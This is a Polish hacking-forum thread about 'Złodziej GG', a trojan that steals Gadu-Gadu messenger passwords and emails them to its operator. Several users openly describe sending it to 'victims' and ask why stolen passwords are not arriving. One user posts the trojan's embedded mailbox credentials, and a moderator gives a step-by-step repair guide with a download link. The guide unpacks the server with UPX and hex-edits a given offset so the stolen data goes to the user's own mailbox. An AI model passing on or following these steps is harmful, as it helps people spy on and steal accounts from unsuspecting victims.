Złodziej GG v1.0 [DOWNLOAD]

Status
Zamknięty.

Wojtek

Były Moderator
Dołączył
Maj 23, 2007
Posty
546
Originally posted by Dark Smark
Podziękujcie koledze projekt zamknięty.

Niby za co ... co takiego 31337 zrobił bo na razie to sie tylko domyślam ...
<


Żegnaj dark ...
<
będziemy Cię pamiętać
<


//Trzeba przyznać 31337 ma swój styl ... co kolwiek zrobił ...
 
3

31337

Gość
W jakiej szkole średniej uczą delphi?
<
Bo ja rzeczywiście mam blade pojęcie, nie pisze ctrl+c ctrl+v tylko z główki a nie jak inni
smile.gif
[/b]
Też jestem w szkole średniej (1 klasa), i u mnie ucza podstaw pascala. Raz przez to nie zdałem bo to ja decyduje czego chce sie uczyć a co mam w dupie. Również mało umiem, ale jak czegoś nie wiem to szukam i zadaje pytania, a nie publikuje śmiechu warty program. Jak szczerze interesuje cie programowanie to napiszesz to od początku tak aby nie można było go rozwalić (najprościej http get, lub własny protokól o ile masz server).
A jak masz to gdzieś i chcesz być pr0 evul haxorem piszącym super trojany to sie obrazisz i pójdziesz grac w tibie ;]
Gdyby ci zależało na twoim programie to byś mi nawet podziękował że oszczędziłem ci pytań czemu nie działa/czemu passy nie dochodzą.
 

Hella19

Użytkownik
Dołączył
Wrzesień 6, 2007
Posty
4
hej. mam do Was takie pytanko a raczej prosbe o pomoc.
Otów mam program Zlodziej gg. zainstalowalam itd. wysłalam ten plik do "ofiary" ;] on to dostał zapisał, próbował właczyc- nie dało sie ,wiec wszystko chyba zrobiłam dobrze. Ale nie dostałam zadnych jego plików na maila i nie wiem co jest grane.
Pomozcie
Pozdrawiam
 

wojteksg

Użytkownik
Dołączył
Grudzień 29, 2006
Posty
52
Powiedzcie czy ten link jest ok. Bo od gościa co ma 2 posty trochę boje sie brać. Albo chociaż ile wazy program a ile serwer.
 

black pearl

Użytkownik
Dołączył
Wrzesień 6, 2007
Posty
4
U mnie to jakoś nie działa. Zostawiłem na noc czytajac poprzednie posty że to może "troche" potrwać ale rano nic. Sam program działa i w procesach dochodzi do 47 tys bajtów, ale nic nie wysyła. Fwall Zone Alarm wyłączyłem, NOD32 nie zapiszczał, ale dalej brak transferu na poczte, zprawdzilem AIDA32 i pisze wyraznie ze nic sie nie wysyla, jakies pomysly?? (nawet fwalla ustawilem teraz zeby puscil wszystko zwiazane z sgg i DALEJ NIC)
 

kanciol

Użytkownik
Dołączył
Wrzesień 6, 2007
Posty
1
u mnie jest dokladnie to samo. :kreci: Program dziala i generuje sgg ale nic nie wysyla. Wylaczylem Pande i Firewalla i nic.... :glupek2:
 

ICEtraceur

Użytkownik
Dołączył
Lipiec 7, 2007
Posty
36
U mnie wszystko działa, programik pobrałem z linku autora i nie było żadnych problemów.
Poczekajcie trochę na meila, mi na gmail przyszedł po paru minutach. A uruchomiony na kompie był z jakieś 3min.
 

3rr0rx

Użytkownik
Dołączył
Luty 10, 2007
Posty
712
Maile wam nie przyjda bo...
Kod:
[email protected]

zlodziejgg230391a



hasełko zmienione, thx, bye.
Troszeczke rozumku :)

Mozna sprobowac wypakowac UPX i podmienic pola jakims hex edytorem

Mo4x wlasnie napisal dokladnego tutka wiec looknijcie sobie ;p
 

Mo4x

Były Moderator
Dołączył
Grudzień 26, 2005
Posty
704
Dark Smark, popełniłeś malutki błąd w tym programie, który pozwolił "unieruchomić" Twój program. Ten mail i haslo co mozna odczytac w kodzie programu powinien byc ustawiany przez uzytkownika w konfiguratorze! Wtedy każdy założyłby sobie swóje konto e-mail o którym by tylko on wiedział.

31337, gratulacje, co za wyczyn, odczytać niezaszyfrowany e-mail i hasło z niezaszyfrowanego pliku.

Wszystko da się naprawić, ktoś już pisał, że trzeba podmienić w hex edytorze pewne pola. Ściągamy niedziałający (zaraz go naprawimy) program Złodziej (http://mo4x.ovh.org/zlogg10.zip). Uruchamiamy go i generujemy serwer. Teraz wygenerowany serwer musimy wypakować, bo jest on skompresowany UPX'em.

Ściągamy UPX'a, i odpalamy go z Wiersza polecenia z parametrem -d (Przeciagnac upx.exe na okno wiersza polecenia, postawic spacje, napisac -d, znow postawic spacje, przeciagnac plik serwera (sgg.exe) na okno wiersza polecenia. Kliknac Enter.). Plik się wypakuje. Otwieramy ten wypakowany plik w edytorze szesnastkowym xvi32. W programie xvi32 z górnego menu klikamy Address -> Goto.... Pojawiło nam się okno, wszystko ustawiamy tak jak na obrazku:
67619238sl5.jpg


Następnie klikamy OK. Program przeniósł nas pod rządany adres ($80E60).

Spójrzmy na screen:
123asdwg5.jpg


Teraz według własnych potrzeb zmieniamy powyższe dane. Pamiętajcie tylko, że podmieniony tekst musi być tak samo długi jak ten co był. Można zrobić, żeby był dłuższy, ale trzeba by sie bylo jeszcze tym pobawić.

Przykładowo zmieniony e-mail i haslo:
3452345wi8.jpg


Jeżeli coś nie rozumiesz to pisz.
 
Status
Zamknięty.
Do góry Bottom